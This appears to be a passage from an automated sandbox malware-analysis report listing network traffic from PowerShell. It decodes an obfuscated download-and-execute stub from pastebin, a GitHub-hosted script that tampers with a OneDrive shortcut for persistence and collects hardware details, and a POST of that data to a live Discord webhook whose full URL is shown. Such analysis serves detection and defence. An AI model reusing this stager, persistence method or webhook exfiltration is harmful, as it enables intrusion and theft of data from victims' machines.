                                                            Oct 15, 2024 17:58:15.502379894 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 15:58:15 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120102-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729007895.446821,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 16:03:15 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849713104.20.3.235802716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 17:58:20.797343016 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 17:58:21.449625015 CEST472INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 15:58:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Tue, 15 Oct 2024 16:58:21 GMT
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Server: cloudflare
                                                            CF-RAY: 8d3102979e5d2e67-DFW
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.849715185.199.110.133802716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 17:58:22.332072020 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 17:58:22.963156939 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 15:58:22 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120111-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729007903.899840,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 16:03:22 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849705104.20.3.2354435180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 15:58:14 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:14 UTC396INHTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 15:58:14 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 13
                                                            Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d31026dbb34eaa0-DFW
                                                            2024-10-15 15:58:14 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 15:58:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849708185.199.110.1334435180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 15:58:16 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:17 UTC900INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 15:58:17 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120097-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729007897.026321,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: 5c8f6b3b2596dd0d27bde73de5aa2b7d7554c0db
                                                            Expires: Tue, 15 Oct 2024 16:03:17 GMT
                                                            Source-Age: 196
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 15:58:17 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849710162.159.136.2324432944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 15:58:16 UTC333OUTPOST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 216
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:17 UTC25INHTTP/1.1 100 Continue
                                                            2024-10-15 15:58:17 UTC216OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 68 75 62 65 72 74 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 61 74 43 41 44 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 5f 5f 5a 43 43 31 39 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                            Data Ascii: { "content": "**user** has joined - atCAD\n----------------------------------\n**GPU:** A__ZCC19\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                            2024-10-15 15:58:17 UTC1369INHTTP/1.1 204 No Content
                                                            Date: Tue, 15 Oct 2024 15:58:17 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            set-cookie: __dcfduid=4acea64c8b0e11ef86bf5ac280988193; Expires=Sun, 14-Oct-2029 15:58:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729007898
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vpYvtJ0khN%2BXcV%2BMT%2FavY1B04I%2FSwkMDFeUDqODH9KbUovZybIBNKhLAqVJhHqR47Wwwebr854FJXkyA4WXWCyimChyR8LlA6WZP1decSV0Thjbgk9CwJgyn%2BhQA"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: __sdcfduid=4acea64c8b0e11ef86bf5ac28098819300713bf47cd6910f3b17cb35f1df607c9f3de4f9c8298101fa3b65b7d48548fc; Expires=Sun, 14-Oct-2029 15:58:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                            Set-Cookie: __cfruid=9befb79772714ec8151410462c0c36f10b8dd4e5-1729007897; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Set-Cookie:
                                                            2024-10-15 15:58:17 UTC200INData Raw: 20 5f 63 66 75 76 69 64 3d 72 55 56 34 67 39 61 78 4f 67 4b 68 59 67 68 39 6b 6b 61 42 73 69 77 77 73 50 55 42 53 57 51 74 45 6c 4e 77 4a 49 59 52 31 6c 55 2d 31 37 32 39 30 30 37 38 39 37 32 38 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 31 30 32 37 63 37 62 35 32 34 37 61 66 2d 44 46 57 0d 0a 0d 0a
                                                            Data Ascii: _cfuvid=rUV4g9axOgKhYgh9kkaBsiwwsPUBSWQtElNwJIYR1lU-1729007897289-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d31027c7b5247af-DFW


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.849714104.20.3.2354432716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 15:58:22 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:22 UTC396INHTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 15:58:22 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 21
                                                            Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d31029ccea76b56-DFW
                                                            2024-10-15 15:58:22 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 15:58:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.849716185.199.110.1334432716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 15:58:23 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:23 UTC900INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 15:58:23 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120056-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729007904.670528,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: ab08483de387b5c38e36cf00f692e3910916e3f0
                                                            Expires: Tue, 15 Oct 2024 16:03:23 GMT
                                                            Source-Age: 203
                                                            2024-10-15 15:58:23 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 15:58:23 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
